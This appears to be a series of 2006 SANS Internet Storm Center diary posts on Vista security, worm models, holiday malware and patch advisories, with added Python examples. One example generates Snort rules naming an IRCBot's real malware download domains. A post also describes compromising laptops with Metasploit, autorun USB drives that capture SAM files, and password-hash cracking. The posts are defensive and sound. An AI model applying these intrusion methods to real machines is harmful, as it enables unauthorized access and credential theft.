  • Signed applications can voluntarily state in their profile what they are expected to do and not do. Vista will enforce that profile and terminate processes stepping outside of it. E.g.:
    An MTA could have a profile that says it's only going to listen on port tcp/25.  Suppose the process gets exploited and starts to listen on another port to open up a backdoor: Vista could terminate the process right there.
    Since the thing is voluntary I'm wondering where the incentive will be for developers to use the belt and suspenders approach.
  • Virtualization: Once you have tried to get your users to give up local admin rights, you know it's a pain. For the smallest thing they need help and additional permissions, and just about any application you need won't play nice without a 10-round fight. Vista addresses this by virtualizing the filesystem for older "legacy" applications. If the application wants to drop an .ini file in c:\windows\, it's not given an error; the file is dropped in a user-owned directory instead. Reads are redirected the same way, so the misbehaving application is fooled into working without having write access to critical directories.
  • The well-publicized locking of kernel mode additions, on 64-bit kernels only (32-bit would break drivers apparently; there are no to very few 64-bit drivers that would break, according to the presenter). Not in the presentation obviously, but there's the entire fight between Microsoft and the antivirus industry over this as well.
My impression is that they indeed did some significant work. Especially the work to make it easier to run without local admin rights seems a major step forward.
They also left out some easy-to-achieve things that would make the world a lot safer. E.g. IE7 doesn't make it any harder to visit an https site with a bad SSL certificate. Just pressing next still accepts the bad cert and shuts up about it. This makes man-in-the-middle attacks way too easy.
I'm worried about the confidence they have this will be enough to change the tide. And most of all, I'm worried about the added complexity, as complexity creates more (security) bugs in my experience.

So: make up your own mind and let us know in the poll.

Swa Frantzen -- Section 66


Published: 2006-12-25

Changing Threat Models

    A number of days ago, a reader pondered the possibility of an SNMP "Slammer Worm" based on the vulnerability described in MS06-074.  What exactly would it take for there to be another "Slammer"-like event?  A worm outbreak requires two major components: an internet worm, and a vulnerable population.  The model for the internet worm is made up of further sub-components: the scanner, the propagation code, and the exploit.  Scanning routines influence the success and impact of a worm; poorly written scanning routines have limited many promising young worms in the past.  A lot of time has been spent studying the scanning methods of worms (I've wasted an hour or two on it myself); take a glance through www.wormblog.com to see the number of white papers and academic works on the topic.  The propagation code must be written to accommodate any limitations placed upon it by the vulnerability exploited (such as size limitations, NOP codes, or other constraints on the injected data).  Some worms overcame these limitations by using a staged approach.  This workaround has its drawbacks, as the secondary stage can add its own limitations to the worm: the transfer may fail because of firewall rules, or the source of the secondary payload may make a lucrative target for incident handlers.  Finally, the vulnerability must allow for unauthenticated remote execution of arbitrary code.  Since proven scanning routines are publicly available, and there are multiple examples of propagation code in circulation, the announcement of any network-visible vulnerability that allows unauthenticated remote execution of arbitrary code creates a potential situation.

     A quick review of MS06-074:

SNMP Memory Corruption Vulnerability (CVE-2006-5583)

CVSS (Base)  : 10.0 http://nvd.nist.gov/cvss.cfm?name=CVE-2006-5583&vector=(AV:R/AC:L/Au:NR/C:C/I:C/A:C/B:N)

Exploit code: Privately Available

     Now, some special things about SNMP: since it's UDP, the source IP address can be spoofed without affecting delivery of the exploit; also, knowledge of the SNMP community string may or may not be required to successfully deliver the exploit.

     This brings us to our second requirement for an "outbreak event," a vulnerable population.  Although a lot of systems are running SNMP, not that many are running with UDP/161 open to the internet.  On the other hand, there is a class of networks that may have UDP/161 allowed in from "trusted" 3rd party networks, which, given the spoofability of UDP, isn't such a sound security practice.  These particulars alone would have limited impact on worm development, though the general inaccessibility of the SNMP port is a major limiting factor on the success of the potential worm.

    The limited size of the vulnerable population severely limits the possibility of a generalized Internet worm with "slammer"-like impact.

    If there was a large population ripe for an MS06-074 worm, I still reason that there would not be a "slammer"-like worm exploiting this vulnerability.  I left out one important criterion for a worm in the model above.  In addition to scanning routines, propagation methods, a vulnerability exploit, and a vulnerable population, a worm also needs a motivated creator in order to come into existence.  (I'm chagrined to admit that malware follows a model of intelligent design, and not Darwinian evolution.)

    The model of the malcode author has changed these past years.  Monetary gain has now outpaced the egotistical quest for fame/notoriety, etc. as the driving motivation behind malcode creation.  A malcode author wants to be able to leverage their creation, so now you see botnets, not internet worms.

    So, we will not likely see an SNMP "slammer" worm.  The question should be: "will we see an SNMP 'SDbot'?"  Because of how SNMP is often implemented, I don't see a large chance of that either.

    With exploit toolkits like metasploit and webattacker, every new vulnerability that is discovered runs the possibility of becoming an "event."  Neither of these toolkits will create an internet worm like slammer.  Instead they make smaller, harder-to-detect events that can be leveraged by the criminal to cause more damage in the long run.

kliston -at- isc.sans.org


Published: 2006-12-25

A Security Sampler

Recently, a box full of laptops found their way into my possession.  They had come from a number of small businesses via various sales and trades and were destined for a new startup.  My job was to sanitize them and reinstall the OS for the client.  In the meantime, they presented an opportunity to see how the small-business system administrator secures his or her systems.

The systems ranged from Windows 98 through Windows XP.  They underwent a simple physical inspection/inventory and were then subjected to "evil" acts.  They were used in a demonstration of Metasploit as live-fire targets.  Malicious USB drives were inserted into them.  Finally they were subjected to forensic examination.

Metasploit Results

Without fail, blind plinking from metasploit, (or a simple nessus scan followed by less-blind plinking with metasploit) resulted in a compromised system.  To be fair, the machines hadn't seen Windows Update in a month or two, they had been sitting idly on shelves or packed in boxes.  The Windows 98 systems enjoyed a bit of security through obsolescence and were tougher targets for metasploit.

Anti-Virus and Anti-Spyware Protection

Every system had some sort of Anti-virus protection.  This is a good thing.
All systems, except for the Win98 systems, had anti-spyware as well; Spybot S&D was very popular, followed by Ad-Aware.

Malicious USB

With all of the AV and Anti-spyware running on the systems, none detected the malicious USB drives.  Most systems happily complied with the autorun requests.  There were many SAM files captured this way.


The systems that resisted the malicious USB drives did not stand up to booting up with Knoppix and pulling the files that way.  None of the systems used any drive encryption or BIOS protection.

VNC and other BackDoors

Many of the systems booted up with VNC running in listen mode.  Probably handy for the sysadmin to maintain their flock, but a strong password, or maybe system-specific passwords may have been a better choice.

One admin created a backdoor account with Administrator privileges (but they do get points for not granting Administrator privileges to all of their users); unfortunately, with such a weak password on it, the strong password protecting the real Administrator account didn't keep my class out of their machine.


Cain and Abel and John the Ripper made quick work of the password hashes.  There was not a single instance of a special character in any of the passwords.  Great classics like: password and 1234567 were disappointingly common.  Administrator passwords were also weakly protected, with only simple tricks attempted like reversing the company's name.
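A password audit check that encodes the weaknesses listed above (no special characters, the classics "password" and "1234567", and the company name reversed), as an added example that is not from the diary or the class. The company name, the account list and the extra common-password entries are constructed assumptions.

```python
import re

# Classics named in the diary plus a few more common entries (the extras are assumptions).
COMMON_WEAK = {"password", "1234567", "123456", "letmein", "welcome"}

# Constructed audit input: account name -> recovered password. Not real data.
RECOVERED = {
    "jsmith": "password",
    "backdoor": "1234567",
    "svc_backup": "procemca",      # "acmecorp" spelled backwards
    "Administrator": "Tr0ub4dor&3",
}


def weak_password_reasons(password, company_name):
    """Return the list of policy failures for one password (empty list means it passes)."""
    reasons = []
    if len(password) < 8:
        reasons.append("shorter than 8 characters")
    if not re.search(r"[^A-Za-z0-9]", password):
        reasons.append("no special character")
    if password.lower() in COMMON_WEAK:
        reasons.append("common password")
    # Compare against the company name with spaces/punctuation stripped, forwards and reversed.
    norm = re.sub(r"[^a-z0-9]", "", company_name.lower())
    lowered = password.lower()
    if norm and (norm in lowered or norm[::-1] in lowered):
        reasons.append("derived from company name")
    return reasons


def audit(recovered, company_name):
    """Map each failing account to its reasons; accounts that pass are omitted."""
    report = {}
    for account, pw in recovered.items():
        reasons = weak_password_reasons(pw, company_name)
        if reasons:
            report[account] = reasons
    return report


if __name__ == "__main__":
    for account, reasons in audit(RECOVERED, "Acme Corp").items():
        print("%-14s %s" % (account, "; ".join(reasons)))
```

The company-name check is deliberately loose (substring match in either direction) because the diary's admins used exactly that trick; a real audit would also add the product names and the town the business sits in.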

Forensic Fun

Imaging drives, recovering files, documentation: good times, but important if you're going to build a case, and important to practice.  It doesn't come without its rewards.  In the course of the simulated investigation we uncovered two failing marriages, one interoffice romance (nestled ironically amongst PowerPoint presentations on Sexual Harassment in the Workplace), and all the pr0n one could hope for from Google Images.  Sigh.

Surprising Find

The surprising find was a lack of rootkits.  I was surprised to find very little spyware as well.

Final Word

There is a surprising amount of company information that walks out the door on the average laptop.  Although the word has gotten out about AV and anti-spyware protection, USB lockdown and drive encryption should also be universally applied to mobile assets.  You never know where your old equipment may end up, and who might be writing about what they find…

kliston -at- isc.sans.org


Published: 2006-12-25

Merry Christmas to All!

If there's a new computer under your Christmas tree this morning, please be sure to secure your shiny new toy before you start cruising the Internet or downloading free software.  Likewise, if mom and dad, or brother, or sis, or grandma and grandpa, or your clueless nextdoor neighbor (who still has his SSID set to DEFAULT after years of warning) received a new computer-thingy, please take a moment when you call or visit on Christmas Day to make sure that they know how to install patches, configure their firewall, and know how to keep their antivirus software up to date.  Everybody else on the Internet will really appreciate your efforts!!!  Oh, and fix that access point while you are at it.

From all of us here at the Internet Storm Center, thanks to you - our faithful readers - for another year of support and friendship!  Without you we would just be a bunch of incident handlers with nothing to handle.

We hope you have a wonderful holiday season and keep those DShield logs coming.  We want packets for Christmas!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-24

'Twas the night before Christmas, when all through the house Not a creature was stirring, not even a mouse.

Maybe no mice, but if the internet is on, plenty of things are flowing.

First, reports of a few million break-and-enters in Australia, New Zealand and some of the Pacific Islands, possibly related to the unauthorised air traffic in the same regions.  Also wanted for littering (not collecting animal droppings).

On a packet note:  
Cheat Trojan

Robert reported that a friend downloaded a Battlefield cheat which proceeded to infect his system. We'll be having a look at that one. 

Gordon has reported that he is seeing some packets with flags (CWR ECE) set, going towards webmin ports. There was a new release back on the 28th of November, but currently no reported vulnerabilities.

Port 8555/2967
Port 8555 and 2967 activity has tapered off (for the moment).  This specific instance we were looking at looks like a variation of  the SAV activity of recent weeks.  If your corporate AV is not yet up to date (that is software, not just patterns) then you may still be vulnerable.  The timing of this was exquisite, just the few days of the year on which corporate types would be on the net and checking emails, finishing off that last report etc.


Spam in AU has tapered off a little as well over the last day or two.  One or two readers have reported similar results in their region.  Everybody probably has already bought their medicine, extensions, reductions, software and penny stock for the year.   Maybe with the January sales it will start ramping up again.

Happy holidays to all from the ISC



Published: 2006-12-24

Careful with the seasonal attachments!

Season's greetings are all good and fine, but we must alert our respective user bases that those who don't go along with the seasonal spirit are out there to hurt us.
Any of those can and will get you in trouble. And reliance on anti-virus software should not be too high. The PowerPoint file above was detected badly at the time we got our copy of it:
Vendor              Version         Date        Result
AntiVir                             12.23.2006  EXP/PPT.Dropper.Gen
Authentium          4.93.8          12.22.2006  no virus found
Avast               4.7.892.0       12.21.2006  no virus found
AVG                 386             12.23.2006  no virus found
BitDefender         7.2             12.23.2006  no virus found
CAT-QuickHeal       8.00            12.23.2006  no virus found
ClamAV              devel-20060426  12.23.2006  no virus found
DrWeb               4.33            12.23.2006  no virus found
eSafe                               12.23.2006  no virus found
eTrust-InoculateIT  23.73.97        12.23.2006  no virus found
eTrust-Vet          30.3.3271       12.23.2006  PP97M/MS06-012!exploit
Ewido               4.0             12.23.2006  no virus found
Fortinet                            12.23.2006  no virus found
F-Prot              3.16f           12.22.2006  no virus found
F-Prot4                             12.22.2006  no virus found
Ikarus              T3.1.0.27       12.23.2006  no virus found
Kaspersky                           12.23.2006  no virus found
McAfee              4925            12.22.2006  no virus found
Microsoft           1.1904          12.23.2006  no virus found
NOD32v2             1936            12.23.2006  no virus found
Norman              5.80.02         12.22.2006  no virus found
Panda                               12.23.2006  no virus found
Prevx1              V2              12.23.2006  no virus found
Sophos              4.12.0          12.22.2006  no virus found
Sunbelt             2.2.907.0       12.18.2006  no virus found
TheHacker                           12.20.2006  no virus found
UNA                 1.83            12.22.2006  no virus found
VBA32               3.11.1          12.23.2006  no virus found
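The scan table above, parsed by an added helper that is not part of the original diary. The raw lines come in "Vendor [Version] Date Result" form with the version column missing for some engines, so the date is used as the anchor column; the helper counts detections and lists engines whose signature date is older than a cutoff. The cutoff date used in the usage line is an assumption.

```python
import re
from datetime import datetime

# The engine results quoted in the diary, in the raw "Vendor [Version] Date Result" form.
RAW_RESULTS = """\
AntiVir 12.23.2006 EXP/PPT.Dropper.Gen
Authentium 4.93.8 12.22.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.23.2006 no virus found
BitDefender 7.2 12.23.2006 no virus found
CAT-QuickHeal 8.00 12.23.2006 no virus found
ClamAV devel-20060426 12.23.2006 no virus found
DrWeb 4.33 12.23.2006 no virus found
eSafe 12.23.2006 no virus found
eTrust-InoculateIT 23.73.97 12.23.2006 no virus found
eTrust-Vet 30.3.3271 12.23.2006 PP97M/MS06-012!exploit
Ewido 4.0 12.23.2006 no virus found
Fortinet 12.23.2006 no virus found
F-Prot 3.16f 12.22.2006 no virus found
F-Prot4 12.22.2006 no virus found
Ikarus T3.1.0.27 12.23.2006 no virus found
Kaspersky 12.23.2006 no virus found
McAfee 4925 12.22.2006 no virus found
Microsoft 1.1904 12.23.2006 no virus found
NOD32v2 1936 12.23.2006 no virus found
Norman 5.80.02 12.22.2006 no virus found
Panda 12.23.2006 no virus found
Prevx1 V2 12.23.2006 no virus found
Sophos 4.12.0 12.22.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 no virus found
TheHacker 12.20.2006 no virus found
UNA 1.83 12.22.2006 no virus found
VBA32 3.11.1 12.23.2006 no virus found
"""

DATE_RE = re.compile(r"^\d{2}\.\d{2}\.\d{4}$")
CLEAN = "no virus found"


def parse_line(line):
    """Split one result line into (vendor, version, date, result); version may be ''.
    The date column is the anchor because the version column is optional."""
    tokens = line.split()
    date_idx = next((i for i, tok in enumerate(tokens) if DATE_RE.match(tok)), None)
    if date_idx is None or date_idx == 0:
        raise ValueError("cannot find vendor/date columns in: %r" % line)
    return (tokens[0], " ".join(tokens[1:date_idx]), tokens[date_idx],
            " ".join(tokens[date_idx + 1:]))


def parse_results(raw):
    return [parse_line(line) for line in raw.splitlines() if line.strip()]


def summarize(raw):
    """Detection count plus the names each detecting engine reported."""
    rows = parse_results(raw)
    names = {vendor: result for vendor, _, _, result in rows if result != CLEAN}
    return {"total": len(rows), "detected": len(names), "names": names}


def stale_engines(raw, cutoff):
    """Vendors whose signature date is strictly older than cutoff (both 'MM.DD.YYYY')."""
    limit = datetime.strptime(cutoff, "%m.%d.%Y")
    return [vendor for vendor, _, date, _ in parse_results(raw)
            if datetime.strptime(date, "%m.%d.%Y") < limit]


if __name__ == "__main__":
    s = summarize(RAW_RESULTS)
    print("%d of %d engines detected the sample: %s"
          % (s["detected"], s["total"], sorted(s["names"])))
    print("engines with signatures older than 12.21.2006:",
          stale_engines(RAW_RESULTS, "12.21.2006"))
```

The stale list matters when reading a multi-engine result: an engine that last updated days before the sample arrived could not have had a signature for it, so its "no virus found" says little about the vendor and a lot about update hygiene.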

With thanks to Michael for sending in the powerpoint sample.

The abuse of the season's greeting habit by the bad guys isn't something new. We warned about it last year (Dec 2005) already. It's still just as valid as it was then.

Swa Frantzen -- Section 66


Published: 2006-12-24

phpBB 2.0.22 - upgrade time

phpBB had an early X-mas gift in the form of a release of phpBB 2.0.22. The release fixes a number of security issues as well as functional issues. The security issues can be summarized as:
  • Check for the avatar upload directory reinforced
  • Changes to the criteria for "bad" redirection targets
  • Fixed a non-persistent XSS issue in private messaging
  • Fixing possible negative start parameter
  • Added session checks to various forms
Considering the past exploitation of phpBB vulnerabilities, it might be best not to postpone this upgrade till after the holidays and get to it now.

Don't forget to both upgrade the files and run the script, as well as apply the patch to the subSilver template in any derived template you might have.

Swa Frantzen -- Section 66


Published: 2006-12-23

Christmas . exe is making the rounds

Obviously at any holiday-ish time of the year the malware writers out there are going to package their warez in an appropriately named file.  This time it's Christmas.e x e...

A reader wrote in and pointed us to an article over on f-secure.  Check it out.

A nice quote from the article.

"We've just received a sample of something that's called CHRISTMAS.EXE. When run, this IRCBot variant will try to download various malicious executables from web servers at waiguadown.008.net and user.free.77169.net. As a decoy, it shows this Christmas-themed image... Obviously, a gift that keeps on giving. To be avoided."

It would be pretty easy to write a Snort rule to catch these.  You could do it one of many ways: look for the DNS request, look for the GET, and so on.  Have fun with those.  If you'd like to write in with a couple of examples, feel free.
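One way to build the DNS-request rule the diary invites, as an added example that is not from the diary or F-Secure. It takes the two download domains quoted above, encodes them the way they appear in a DNS query (length-prefixed labels instead of dots, which is why a plain dotted string never matches DNS traffic), checks that encoding against a constructed query, and renders matching Snort rules for both the DNS lookup and the HTTP Host header. The rule text and the local SID range are assumptions.

```python
import struct

# Domains from the F-Secure quote above; the query built below is constructed, not a capture.
SUSPECT_DOMAINS = ["waiguadown.008.net", "user.free.77169.net"]


def dns_wire_name(domain):
    """Encode a name as it appears in a DNS query: length-prefixed labels, NUL terminated."""
    encoded = b""
    for label in domain.rstrip(".").split("."):
        encoded += bytes([len(label)]) + label.encode("ascii")
    return encoded + b"\x00"


def snort_dns_content(domain):
    """The same encoding as a Snort content string, e.g. |0A|waiguadown|03|008|03|net|00|."""
    return "".join("|%02X|%s" % (len(label), label)
                   for label in domain.rstrip(".").split(".")) + "|00|"


def build_query(domain, txid=0x1234):
    """A minimal A-record query: 12-byte header, QNAME, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + dns_wire_name(domain) + struct.pack("!HH", 1, 1)


def matching_domains(payload, domains=SUSPECT_DOMAINS):
    """Which suspect names occur, in wire form, in a UDP payload."""
    return [d for d in domains if dns_wire_name(d) in payload]


def snort_rules(domains=SUSPECT_DOMAINS, sid_base=1000001):
    """One DNS rule and one HTTP rule per domain. SIDs in the local range (1000000+)
    are an assumption; adjust to your rule set."""
    rules = []
    for i, d in enumerate(domains):
        rules.append('alert udp $HOME_NET any -> any 53 (msg:"DNS query for %s"; '
                     'content:"%s"; sid:%d; rev:1;)' % (d, snort_dns_content(d), sid_base + i))
        # In HTTP the name travels as text, so the dotted form matches directly.
        rules.append('alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS '
                     '(msg:"HTTP request to %s"; flow:to_server,established; '
                     'content:"Host: %s"; nocase; sid:%d; rev:1;)' % (d, d, sid_base + 100 + i))
    return rules


if __name__ == "__main__":
    for rule in snort_rules():
        print(rule)
    print(matching_domains(build_query("waiguadown.008.net")))
```

Infected hosts that use a hard-coded resolver or already have the name cached will not trigger the DNS rule, which is why the HTTP rule is generated alongside it.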

Happy Holidays all!

/** Joel Esler **/


Published: 2006-12-22

Port 8555 and 2967 activity

A reader reported an infection on one of their machines.  On investigating it further it looks like there is increased activity (quite significant increase) on ports 8555 and 2967.

2967 is used by Symantec AV (Corp edition, managed clients only).  The limited number of packets we currently have show traffic hitting the 2967 port and responding to port 8555.   Looking at the dshield information  for 8555 there is a significant increase in traffic to this port since December 20, suggesting that there may be infected machines already out there.  Port 2967 has had its ups and downs over the last few weeks, but is also increasing.

To do further analysis we need packets.  So if you have any captures relating to these ports please pass them along to us using the contact form. 

ISC Handler on Duty


Published: 2006-12-22

PoC for local elevation of privilege on Windows 2000 SP4 upwards

The Microsoft Blog notes that they are tracking a Proof of Concept exploit.  It targets the Client Server Run-Time Subsystem.  The blog states that initial indications are that you need to be authenticated before you can take advantage of it.  It affects Windows 2000 SP4, Windows Server 2003 SP1, Windows XP SP1, Windows XP SP2 and Windows Vista.

If you have more info feel free to drop us a packet or two.
eEye has some additional info on the exploit here.

ISC Handler on Duty


Published: 2006-12-22

Challenge Update

The packet challenge is going well, with people in alternate time zones favoured or those of us that have no life, sorry I meant to say work late.

The first correct response was received by Morgan (wd), smartly followed by Mike and Kenny and his colleague M.

Check the list twice as this little Santa got the order wrong initially and that seems to be a common thing.

Challenge Link


Published: 2006-12-22

All I want for christmas are my exploits....

Not really, but it seems like that is what we are all getting.  It has definitely been the trend over this past year.  There have been so many exploits, zero days, month of bugs, week of bugs etc. that it's hard to keep track of all of them.  The Internet is literally crawling with them (yes, pun intended).  January is supposed to be the month of the Apple bugs.  It's going to be an interesting new year, that's for sure.  So, here are some of the newer exploits that we are all getting for Christmas, whether we want them or not!

Oracle:   There are two new exploits out for Oracle.  One lets you read and write operating system files and the other is a directory traversal bug that lets you execute arbitrary commands.  With both of these, the attacker runs with the privileges of the RDBMS user.

Intel 2200BG:  (Intel 2200 driver version This vulnerability uses a malformed beacon frame that can corrupt internal kernel structures and allow for arbitrary code execution.

These are in addition to the other vulnerabilities that we have already covered.  So before you take off for the holidays, if you aren't using something or no one will need a particular service while you're gone, it might be a good idea to block it or turn it off.


Published: 2006-12-21

The Twelve Days of Christmas Packet Challenge

I've had many requests for more packet challenges.  It's great to see folks enjoying themselves and looking at packets!!   In the spirit of the holiday season, I have a gift for everyone who enjoys packets. 

Everyone should know the song "The Twelve Days of Christmas," which goes "On the first day of Christmas, my true love gave to me a partridge in a pear tree.  On the second day of Christmas, ........"  (be glad you can't hear me singing it:>)  I have crafted 12 packets.  In the data portion of these packets, you will find obfuscated data that will tell you what you can get from the handlers this holiday season.  They were written in the context of being an incident handler.  I'm not meaning that we want to send bad things your way:>)  Your challenge is to decode the data AND to order them in the correct order that the gifts should be received.  The packets will tell you the correct ordering of the days if you spend some time looking at them.  I had a lot of fun creating this challenge and I hope that everyone enjoys solving the puzzle.  You can download the packets here.   

I'll post the solution in the future when everyone has a chance to look at the packets.  Good luck and send us your results when you figure it out!


Published: 2006-12-21

Multiple vulnerabilities in Symantec Veritas NetBackup

A couple of days ago (thanks Melvin for reminding us about this) Symantec, together with ZDI, published an advisory about 3 new vulnerabilities in the Veritas NetBackup server application. The vulnerabilities allow an attacker to remotely execute arbitrary code on a vulnerable installation.

In their advisory Symantec states that if Veritas NetBackup is properly configured, authentication will be required in order to exploit these vulnerabilities. They also state that connections should be accepted only from trusted hosts – that is, if you can trust your internal network. We also don't doubt that there are a lot of servers that do not require authentication of clients, which makes them even more exposed to this.

The following versions of Veritas NetBackup are vulnerable:

Veritas NetBackup 6.0 < MP4
Veritas NetBackup 5.1 < MP6
Veritas NetBackup 5.0 < MP7

If you are affected, we would recommend that you visit the following web page: http://securityresponse.symantec.com/avcenter/security/Content/2006.12.13a.html, where you can find the links to maintenance packs that patch this.

Looking at the original advisories by ZDI, it looks like they reported these vulnerabilities back in August to Symantec. This timing of releasing the patch for a remotely exploitable vulnerability just a week before the Christmas break is a bit weird – this should have been done much earlier to give people the possibility of testing this business critical feature in everyone's organization. The last thing people want is to find out that their backup was not successful (or even worse - it was successful but the server has been compromised) when they return back to work after a nice Xmas break.
The only good thing is that, at this point in time, there seems to be no exploit for these vulnerabilities in the wild.


Published: 2006-12-20

Sun JDK 5.0 Update 10

Roseman wrote to tell us that a new update for Sun JDK 5.0 has been released. Amongst a variety of bugs that have been fixed (and some of which seem to be ancient - check bug 4744057; "Potential deadlock between Selector and SelectableChannel", submitted in 2002!), one thing that caught my eye is the bug 6437047.

This "bug" was present with previous versions of Sun's JDK and is related to the Java plugin for Internet Explorer. Previous versions of the JDK were not properly signed which means that they were listed as (Not verified) in Internet Explorer (you can check this by opening the Manage add-ons tools in Internet Explorer: Tools -> Manage Add-ons -> Enable or Disable Add-ons).
This didn't prevent JDK from working, but definitely isn't best practice in security, where we're trying to educate our users to deny any non signed applets/applications/components. Sun finally fixed this (signed the plugin properly) so now the "(Not verified)"  warning is not there any more.

As JDK has automatic updates this should pop up on your machine some time soon (by default, if I'm not wrong, it will check for new updates only once per month). Once you install the new update version, and are happy with it, remember that Sun has a weird habit of *not* removing older versions from your machine, so you might want to do that manually.

New update is available from http://java.sun.com/javase/downloads/index_jdk5.jsp.


Published: 2006-12-19


This newly released security update from Apple has nothing whatsoever to do with the recent "QuickSpace" worm.  It fixes a relatively obscure issue with QuickTime for Java and Quartz Composer.

Nothing to see here... move along.


Published: 2006-12-19

FF/TB Updates

A slew of security fixes are being rolled out for FireFox and Thunderbird.  The patches, which will take FireFox to version or and Thunderbird to fix critical security flaws such as XSS (cross-site scripting) issues, privacy leaks when retrieving RSS feeds, a flaw in SVG / DOM handling, and a cursor image overflow in FireFox.  Thunderbird gets fixes for a mail header overflow and inherits several of the FF fixes as well.  As I write this, the new code doesn't appear to be available, but expect the auto-update feature to kick in soon...

More info: http://www.mozilla.org/security/


The links are now live and you can download this manually, but the auto-update feature is not there yet. Here's the list of security fixes in Firefox version

XSS using outer window's Function object
RSS Feed-preview referrer leak
Mozilla SVG Processing Remote Code Execution
XSS by setting img.src to javascript: URI
LiveConnect crash finalizing JS objects
Privilege escalation using watch point
CSS cursor image buffer overflow (Windows only)
Crashes with evidence of memory corruption (rv:


Published: 2006-12-19

It's baaaaaaaack...

The on-again-off-again update for Microsoft Office 2004 for Mac 11.3.2 is... well... on again.  There are, however, several more hours in the day, and who knows... they might change their mind again.

Get it while you can: http://www.microsoft.com/mac/downloads.aspx#Office2004


Published: 2006-12-19

A cavity in Linux Bluetooth?

Looks like there is an issue with over-filling a cavity (buffer) in the Linux Bluetooth stack's cmtp_recv_interopmsg() function.  At the very least, it's a DoS condition, but it might be possible to leverage into running code using malformed CAPI messages with oversized (1) manu (manufacturer) or (2) serial (serial number) fields.  The issue exists in Linux kernels before and in 2.6.x up to  More information can be found here.


Published: 2006-12-19

Skype 'worm' whinnies...

It appears that the possible Skype "worm" that we reported on yesterday is actually more of a Trojan Horse.  It does not appear to exploit Skype in any way, it works in accordance with the Skype API, and requires end user confirmation (i.e. "click here to run a cool program" kinda thing...). More info from the fine folks at Websense here.


Published: 2006-12-19

Soap Boxing

As we round out yet another year, I thought that I would take the opportunity to climb up on a soapbox and rant about something that has been bothering me for a bit:

We're ending 2006 much as it began: with an in-the-wild, un-patched live-data vulnerability in a widely used Windows application (for those of you with short memories, it was the WMF flaw in IE at the end of 2005, and we have three -- count 'em three -- un-patched Word flaws hanging over our heads now).

But, if you're expecting me to launch into an anti-Microsoft screed, you're about to be sorely disappointed.  Redmond represents far too easy a target at this point, and besides, I've really been trying to make it onto Uncle Bill's "Nice" list before the 25th rolls around.  The dude has over a billion dollars, so you know he's gotta give some primo stocking stuffers…

Back in my days as a True BOFH for a mid-range electronics company, I was constantly amazed at the whacky stuff that would come winging into my company via email.  And no, I'm not talking about spam, chain-emails, or dozens of copies of Mrs. Field's cookie recipes… I'm talking about legitimate business communication that was sent in the stupidest possible format.

We had one supplier who sent out a bi-weekly commodity price level update as an Excel spreadsheet… a header row with a single data row, eight columns wide, 39k.  Eight frickin' numbers!  Another supplier sent in a letter detailing their holiday shutdown as a 675k+ Word file just to communicate two paragraphs of text.

The following is a rough transcript of a phone conversation that I had with the IT department for one of our customers:

Me: "We've suddenly started receiving Excel files from your company"
Them:  "Oh, yes.  Those are part of our new ERP system.  We're quite excited about it."
Me: "Really?  Well, have you taken a close look at the files you're sending out?"
Them: "What do you mean?"
Me: "I think that you're probably sending out a bit more information than you probably should."
Them: "Well, the ERP system generates and emails out the files for us."
Me: "Ok... I'm sure that's handy, but... you see… the Excel file that we received was 3.7 MB… and it only contained one visible line."
Them: "Yes.  That's the information for your company.  You need to fill in the forecast data and send it back."
Me: "But did anyone there ever wonder why it takes 3.7 MB for one line of data?"
Them: "What do you mean?"
Me: "Well… while there is only one VISIBLE line, all of the data for all of your other vendors is still in the file.  Part numbers, prices, contact information… everything."
Them: "No, that's impossible.  The ERP system generates those files."

Their buyer often wondered how we were able to send him proposals barely undercutting our competition on several other parts.  I would have explained it to him, but… well… how it happened was "impossible".

The point?

Business on the whole has gotten sloppy about how we choose to transport data.  We've become so enamored with logos and company letterhead, ERP systems and dancing gerbils in our emails that we've forgotten that networks are about communicating, not about glitz.  If I see one more Excel spreadsheet used to transport photos and text, I'll scream.

There's a reason that the email system was designed to transport text… email is about TEXT.  Granted, there are times that you need to send binary stuff, but on the whole, that should be the exception, rather than the rule… and we certainly shouldn't be going out of our way to make up whole new ways of formatting the data we transport just so we can shove our company logo out on every message we generate.

Binary formatted data carries with it the possibility that a flaw in the associated application can be used as an avenue for compromise.  Using formatted files for the likes of Word, Excel, PowerPoint, etc. when they aren't necessary increases our exposure to attack.  Educating users to be cautious about the dangers of "0-day" Word flaws is far more difficult when every other email they get contains a Word document.  Additionally, binary formatted data often carries far more "other" information than you might think: deleted sections, comments, user information, and (as the story above shows) rows and sheets that are merely hidden rather than removed.
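The file in the story above was a binary .xls; the same mistake survives unchanged in the zipped-XML .xlsx that replaced it, and it is cheap to check for before a file leaves the building. Below is an added example, mine and not part of the original diary or of any ERP product, that builds a constructed .xlsx-style package with a hidden row, a hidden sheet and author metadata, then scans it for exactly that class of leftover. The vendor names, prices and author names are made up, and the package is only complete enough for the scanner to read, not for Excel to open.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces (these are the real, fixed namespace URIs).
NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
NS_DC = "http://purl.org/dc/elements/1.1/"


def q(ns, tag):
    """Clark-notation name for ElementTree lookups."""
    return f"{{{ns}}}{tag}"


def build_sample_xlsx() -> bytes:
    """Constructed sample: one visible sheet with our row, a hidden row holding
    another vendor's pricing, a whole hidden sheet, and author metadata.
    Vendor names/prices are made up; the package is minimal, not Excel-openable."""
    workbook = (
        f'<workbook xmlns="{NS_MAIN}"><sheets>'
        '<sheet name="Forecast" sheetId="1"/>'
        '<sheet name="AllVendors" sheetId="2" state="hidden"/>'
        "</sheets></workbook>"
    )
    sheet1 = (
        f'<worksheet xmlns="{NS_MAIN}"><sheetData>'
        '<row r="1"><c r="A1" t="inlineStr"><is><t>Acme Ltd, part 1001, forecast</t></is></c></row>'
        '<row r="2" hidden="1"><c r="A2" t="inlineStr"><is><t>Other Vendor Inc, part 1002, price 9.95</t></is></c></row>'
        "</sheetData></worksheet>"
    )
    sheet2 = (
        f'<worksheet xmlns="{NS_MAIN}"><sheetData>'
        '<row r="1"><c r="A1" t="inlineStr"><is><t>Full vendor master list</t></is></c></row>'
        "</sheetData></worksheet>"
    )
    core = (
        f'<cp:coreProperties xmlns:cp="{NS_CP}" xmlns:dc="{NS_DC}">'
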